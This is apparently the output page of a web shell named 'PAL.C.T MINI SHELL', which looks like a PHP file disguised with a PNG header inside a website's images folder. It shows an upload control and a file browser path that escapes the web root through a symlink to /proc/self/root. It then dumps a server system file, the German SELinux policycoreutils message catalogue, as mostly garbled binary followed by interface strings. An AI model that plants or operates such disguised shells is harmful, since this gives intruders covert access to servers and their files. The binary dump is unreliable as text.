php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/proc/self/root/usr/share/locale/de/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/proc/self/root/usr/share/locale/de/LC_MESSAGES/policycoreutils.mo

,<*h8i8}8888?8;9&O99v99997:?:C:L:`:s::::::::::;+;<;U;/^;;;;;G;E<$M<)r<M<5<) =lJ=)==2=L2>K>>">
?(?!G?'i?D?B?@A@@4A&7A,^A%A2AAKB5MBTB<BLC(bC,CPC2	D.<DJkD%D(D4E:E]VECE(E!F$FF%G-=GLkGxG1H(=HfHH2HHHH2H#I1<I2nII I"IIJAL
L
MMP&MwMM!MM"MN$NCN-`N%N(N1N*O2:O(mOO%O$OO P>P[P"{P$P!PP%Q'Q GQ hQQQ$QQ%R'R$CRhR$R'RRRS+S@SXSuS"SSS S T'T @TaTzT$TT%TTU3UKU#kUUUUU5V7VVV!uV(V!V"V!W&'WNW$hW/W/W4W2"XUX?oX$X)X)X.(Y,WY)Y)Y.Y,Z)4Z)^Z.Z,Z$Z!	[+[)G[q[v[
[[	[	[[[[\\
\-)\(W\)\2\2\-]*>]*i]%]%]*].^,:^/g^$^/^+^-_+F_+r_'_$_,_-`0F`.w`+`0`4a+8a(da)a+a,a+b#<b%`b#b)b,b+c+-c+Yc-c+c-c-
d.;d(jd-d/d.d$ e)Ee)oe.e-e*e*!f/Lf-|f*f.f2g+7g*cg.g*g0g+h-Eh-sh+h-h,h+(i,Ti)i*i)i&j+'j,Sj*j,j,j+k-1k*_k*k*k*k)l*5l%`l/l-l)l&m/5m-em/m&m0m#n-?n-mn*n)n%n+o-Bo+po$o(o*o*p$@p0ep-p*p#p+q/?q3oq.q&q4q+.r.Zr*r+r+r+s,8s+es/s+s)s-t*Et*pt-t/t)t,#u+Pu/|u0u*u)v.2v-av+v,v.v-w)Ew*ow)w)w,w,xHxQx1px:x9xNyfyxyWy	y2yJz<ezz zz"z+{&K{r{+{#{{!{%|<|X|!u| | |F|
 }+}
?}M}k}	~}}
}}	};}"~%~,~0~6~
Q~
\~j~v~4~~~ ~6Jenw	

<#X	|	

Āր	
+G%SGýӁׁہ'@Ym	

ʂς27C8T8ƃ̓փ!9Wv&Ƅ"(HMbЅ
!<Ibo:7ˆ"@DJcp,FJ&:'<GH($ˊ05O6̋ҋqY`~|,*׍'.*3Y42Ž4E*p'*)R|",	'<Xq}*ܑ'"'Jr]
	rUv̓	.$*S~L%C4_<ѕ0!-_1,4֖#,/(\("ė9PlǘϘטߘ"*#G7k$ڙ#"FΛ*TGP/E&cM5؝.DYl}+՞#",O%lG%\*X,1
n?;5 D#;%Wa[":83s'0ϤEbFRW/=32q=+3'B\jDǨsL\ͩ**5U`JN7Z/2MD3Ƭ]N1ޭ0ɮ4-/:]\	%&V)R|5+ϱ:A6%x#%²˳PǶ, E-f)8#+,G>t.A@$@eG1& 2G/z*,պ#&&)M*w+(λ4&,,S)+ȼ*&-F t*&޽++1%]'*Ⱦ$%+>'j2$($M*j**,8W)u*& $&7F^%/430(d)(1)-<:j:C9$/^L+33;<o7//8D2}44=7X2:++*V[	w"/.*^+44/,O,|'',,&.S1&1-
/;/k-)&./I2y0-25>-t*+-.'-V%'%+.$-S--/-
/;/k0*/1'0Y'++0
/;,k,1/,'0T3-,0,E2r-//-3/a.-.+,I+v(-.,(.U.-/,,>,k,+,'1F/x+(1//1_(2%//C,s+'-/"-R&*,,&,2S/,,-1>5p0(6-70e,---.M-|1-+
/6,f,/3+$.P-/2,+=0i/-.0'/X+.++.;.j!0DJ=h
n	^y\m'/8"+[4&203)d-1!!.%P vN4(]
r}Y(AHL StP$
/ C<d
!
5
LW!f
W+	$049JYix 
!.OA	

8Qd	
 J4S_9s<
	%@)M"w#!1#%AgZ55Tf}+->Z\kR'$ChlrRb]DTX5C<'Sd$"
)7BMAB!'<Ei<1:;Y>:<NL-{)&.*G!r$ :'[4!.=	G}Y
	k	!
.
%;
a
s
1{
1


Xe5+LQ=%1	
g
"m
:
1

/9I:$+*':&b'+)($0U\dlt|$ #FMQUZ$`F	(Nk	je~a!l@1CIc&jh'2,;<B(0F]4po%=vs(9/l{y%bC1iCX:$%|ffTHK@7IQ
GH
)s)W&3m.DI]T"vAh5 66F
a
k80uu|RY'*$4zOe !mG8beZq^wS!|YZ
sJzKi5kO(-
Gw*.VUE>;JczV-}=E\PY-+{P1$p<dX,Rg2t[rqU`g<@j^QwS_J+}yFxqyD	B ?xr0i~n_MaK.Tl~v>Sn:UfA+rNn3B_[9)`"dERW]LO5g8?pt\*`bhH>c3N[xu?}6#DM2ZQPo#M#Ad'4o/=/^7\	W,":LtVX;m&L{79%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s must be a directory%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy and enforcing mode requested:  %s
%s:  Can't load policy:  %s
%s:  Policy is already loaded and initial load requested
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Login Users</b><b>Root Users</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd Booleans DialogAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdd UserAddr %s is defined in policy, cannot be deletedAddr %s is not definedAdminAdmin User RoleAllAllow SELinux webadm user to manage unprivileged users home directoriesAllow SELinux webadm user to read unprivileged users home directoriesAllow Samba to share nfs directoriesAllow Spam Assassin daemon network accessAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow gadmin SELinux user account to execute files in home directory or /tmpAllow guest SELinux user account to execute files in home directory or /tmpAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff SELinux user account to execute files in home directory or /tmpAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm SELinux user account to execute files in home directory or /tmpAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined SELinux user account to execute files in home directory or /tmpAllow unconfined to dyntrans to unconfined_execmemAllow unlabeled packets to flow on the networkAllow user SELinux user account to execute files in home directory or /tmpAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xguest SELinux user account to execute files in home directory or /tmpAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?Bad format %s: Record %sBooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedBoolean NameCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Change process mode to enforcingChange process mode to permissive.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add addr %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if addr %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not commit semanage transactionCould not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create addr for %sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete addr %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not delete the file context %sCould not delete the port %sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux modulesCould not list SELinux usersCould not list addrsCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not list the file contextsCould not list the portsCould not modify SELinux user %sCould not modify addr %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query addr %sCould not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not remove permissive domain %s (remove failed)Could not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set active value of boolean %sCould not set addr context for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set mask for %sCould not set message context for %sCould not set mls fields in addr context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set permissive domain %s (module installation failed)Could not set port context for %s/%sCould not set role in addr context for %sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in addr context for %sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in addr context for %sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCould not test MLS enabled statusCouldn't get default type.
Create/Manipulate temporary files in /tmpCronCurrent Enforcing ModeCustomizedDBUS System DaemonDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDelete UserDescriptionDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for Hal daemonDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd back end serverDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for setroubleshoot daemonDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen controlDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDisabled
Permissive
Enforcing
Do not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnable/Disable additional audit rules, that are normally not reported in the log files.EnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Enter unique name for the confined application or user role.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error initializing capabilities, aborting.
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
Error: you are not allowed to change levels on a non secure terminal 
ExecutableExisting User RolesExisting_UserFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInteracts with the terminalInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdInvalid file specificationKerberosLabelingLinux Group %s does not existLinux User %s does not existList ViewLoad Policy ModuleLoad policy moduleLockdown...Login
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionMinimal Terminal User RoleMinimal X Windows User RoleModify %sModify File ContextModify SELinux User MappingModify UserModify an existing login user record.Module %s.pp already loaded in current policy.
Do you want to continue?Module NameMountNFSNISNameName ServiceNetwork ConfigurationNetwork PortNo context in file %s
Node Address is requiredNode Netmask is requiredNot yet implementedOptions Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 Ports must be numbers or ranges of numbers from 1 to %d PrefixPrintingProcess DomainProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRevert boolean setting to system defaultRoleRoot Admin User RoleRun booleans lockdown wizardSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect Root Administrator User Role, if this user will be used to administer the machine while running as root.  This user will not be able to login to the system directly.Select directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Select the user roles that will transiton to this applications domains.Selinux
File TypeSemanage transaction already in progressSemanage transaction not in progressSends audit messagesSends emailSetup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
Spam ProtectionSquidStandard Init DaemonStandard Init Daemon are daemons started on boot via init scripts.  Usually requires a script in /etc/rc.d/init.dStatusSystem Default Enforcing ModeSystem Default Policy Type: This user can login to a machine via X or terminal.  By default this user will have no setuid, no networking, no sudo, no suThis user will login to a machine only via a terminal or remote login.  By default this user will have  no setuid, no networking, no su, no sudo.To make this policy package active, execute:Toggle between Customized and All BooleansToggle between Customized and All PortsToggle between all and customized file contextTransition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType %s_t already defined in current policy.
Do you want to continue?Type Enforcement fileType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.USER Types automatically get a tmp typeUnable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnknown or missing protocolUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsUser RoleUser with full networking, no setuid applications without transition, no su, can sudo to Root Administration RolesUser with full networking, no setuid applications without transition, no sudo, no su.Uses Pam for authenticationUses dbusUses nsswitch or getpw* callsVerify NameVersionWarning!  Could not retrieve tty information.
Warning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)Writes syslog messages	XENXServerYou must add at least one role for %sYou must enter a executableYou must enter a name for your confined process/userYou must enter the executable path for your confined processYou must select a userYou must specify one of the following values: %s_Delete_Propertiesallall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
offonpppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeunknownusage:  %s [-qi]
use_syslog must be a boolean value Project-Id-Version: policycoreutils.HEAD.de
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2010-07-28 11:31+1000
Last-Translator: 
Language-Team:  <en@li.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: 
Plural-Forms: nplurals=2; plural=(n != 1);
X-Poedit-Language: German
X-Generator: KBabel 1.11.4
%s wurde unbenannt.
%s ist bereits in %s%s ist kein gültiger Kontext
%s ist nicht in %s%s muss ein Verzeichnis sein%s! Erwerb des aktuellen Kontexts für %s fehlgeschlagen. tty wird nicht umbenannt.
%s! Erwerb des neuen Kontexts für %s fehlgeschlagen. tty wird nicht umbenannt.
%s! Konnte neuen Kontext für %s nicht setzen.
%s:  Kann angefragte Richtlinie und Enforcing-Modus nicht laden:  %s
%s:  Kann Richtlinie nicht laden:  %s
%s:  Richtlinie ist bereits geladen und initiale Ladeanforderung ist erfolgt
******************** WICHTIG ***********************
...600-1024<b>Anwendungen</b><b>Login-Benutzer</b><b>Root-Benutzer</b><b>Auswählen:</b><b>TCP-Ports</b><b>UDP-Ports</b>Hinzufügen%s hinzufügenDialog zum Hinzufügen Boolescher VariablenDateikontext hinzufügenNetzwerk-Port hinzufügenSELinux-Login-Zuordnung hinzufügenSELinux-Netzwerk-Ports hinzufügenSELinux-Benutzer hinzufügenSELinux-Benutzerzuordnung hinzufügenBenutzer hinzufügenAddr %s ist in der Richtlinie festgelegt und kann nicht entfernt werdenAddr %s ist nicht definiertAdminAdmin-BenutzerrolleAlleDem SELinux-Benutzer webadm erlauben, nicht privilegierte Benutzerverzeichnisse zu verwaltenDem SELinux-Benutzer webadm erlauben, nicht privilegierte Benutzerverzeichnisse zu lesenSamba erlauben nfs-Verzeichnisse freizugebenDem Spam-Assassin-Daemon Netzwerkzugriff erlaubenDem X-Windows-Server erlauben, einen Speicherbereich sowohl als ausführbar, als auch beschreibbar auszuweisenAllen Daemons erlauben, nicht zugewiesene TTYs zu verwendenAllen Daemons erlauben, corefiles nach / zu schreiben'cdrecord' erlauben, verschiedenen Inhalt zu lesen. NFS, SAMBA, entfernbare Geräte, temporäre Benutzerdateien und nicht vertrauenswürdige InhaltsdateienClients erlauben, in von X gemeinsam genutzten Speicher zu schreibenDaemons erlauben, mit NIS zu laufenEvolution und Thunderbird erlauben Benutzerdateien zu lesengadmin-SELinux-Benutzer erlauben, Dateien im Benutzerverzeichnis oder /tmp auszuführenSELinux Gast-Benutzerkonten erlauben, Dateien im Benutzerverzeichnis oder /tmp auszuführenAusführbaren Java-Stapel erlauben'mount' erlauben, jedes beliebige Verzeichnis einzuhängen'mount' erlauben, jede beliebige Datei einzuhängenAusführbaren 'mplayer'-Stapel erlaubenNormalen Benutzern erlauben, 'ping' auszuführen'pppd' erlauben, für einen regulären Benutzer ausgeführt zu werdenPrivilegierten Dienstprogrammen wie 'hotplug' und 'insmod' erlauben, ohne Einschränkung zu laufenProgrammen erlauben, Dateien an nicht standardmässigen Orten zu lesen (default_t)rc-Skripten erlauben, uneingeschränkt zu laufen, inklusive beliebiger Daemons, die von einem rc-Skript gestartet werden, das Domain-Übertragung nicht explizit definiert hatRegulären Benutzern direkten Zugriff auf die Maus erlauben (nur dem X-Server erlauben)'rpm' erlauben, ohne Einschränkungen zu laufenSASL-Authentifizierungs-Server erlauben, /etc/shadow zu lesen'spamd' Zugriff auf Benutzerverzeichnisse erlaubenDem Squid-Daemon erlauben, sich mit dem Netzwerk zu verbindenSSH-Logins als 'sysadm_r:sysadm_t' erlaubenSSH erlauben von inetd anstatt als Daemon zu laufen'ssh' erlauben, ssh-keyrun auszuführenstaff-SELinux-Benutzerkonten erlauben, Dateien im Benutzerverzeichnis oder /tmp auszuführen'staff'-Web-Browsern erlauben, in Benutzerverzeichnisse zu schreiben'staff_r'-Benutzern erlauben, das 'sysadm'-Benutzerverzeichnis zu durchsuchen und Dateien zu lesen (z.B. ~/.bashrc)Dem stunnel-Daemon erlauben, eigenständig ausserhalb von 'xinetd' zu laufensysadm-SELinux-Benutzerkonto erlauben, Dateien im Benutzerverzeichnis oder /tmp auszuführenErlaube sysadm_t Daemons direkt zu startenDem Mozilla-Browser erlauben Benutzerdateien zu lesenunconfined-SELinux-Benutzerkonto erlauben, Dateien im Benutzerverzeichnis oder /tmp auszuführenUnbeschränkten einen dynamischen Wechsel zu 'unconfined_execmem' erlaubenNicht gekennzeichneten Paketen erlauben, sich durch das Netzwerk fortzubewegenuser-SELinux-Benutzerkonto erlauben, Dateien im Benutzerverzeichnis oder /tmp auszuführenErlaube Benutzer, auf mysql-Socket zu verbindenErlaube Benutzer, auf postgres-Socket zu verbindenBenutzern erlauben, 'noextattrfile' (FAT, CDROM, FLOPPY) zu lesen/beschreibenBenutzer erlauben, 'ttyfiles' statistisch anzusehen'user_r' erlauben, 'sysadm_r'-Rechte via 'su', 'sudo' oder 'userhelper' zu erlangen. Andernfalls ist dies lediglich 'staff_r' gestattetBenutzern erlauben, Netzwerkschnittstellen zu kontrollieren (setzt zudem USERCTL=true voraus)Benutzern erlauben, den mount-Befehl auszuführenBenutzern erlauben, TCP-Server auszuführen (Verbindung zu Ports und Annahme der Verbindung aus derselben Domain und ausserhalb 'users'). Wird dies verweigert, muss FTP im Passiv-Modus laufen und verändert ggf. auch andere ProtokolleBenutzern erlauben den dmesg-Befehl auszuführenBenutzern erlauben, USB-Geräte zu lesen/beschreiben'xdm' Logins als 'sysadm_r:sysadm_t' erlauben'xen' erlauben, physische Festplatten zu lesen/beschreibenxguest-SELinux-Benutzerkonto erlauben, Dateien im Benutzerverzeichnis oder /tmp auszuführen'xinetd' erlauben, uneingeschränkt zu laufen, inklusive einiger Dienste, die gestartet werden, welche Domain-Übertragung nicht explizit definiert haben.AnwendungWollen Sie %s '%s' wirklich löschen?Ungültiges Format %s: Auszeichnung %sBoolesche VariablenBoolesche Variable %s ist in der Richtlinie festgelegt und kann nicht gelöscht werdenBoolesche Variable %s ist nicht definiertBoolescher VariablennameCVSKann +/- nicht mit anderen Kategorietypen kombinierenKann nicht mehrere Sensitivitäten besitzenKann Sensitivitätsstufen mittels '+' auf %s nicht ändernKonnte Ihren Eintrag in der "shadow"-Passwortdatei nicht finden.
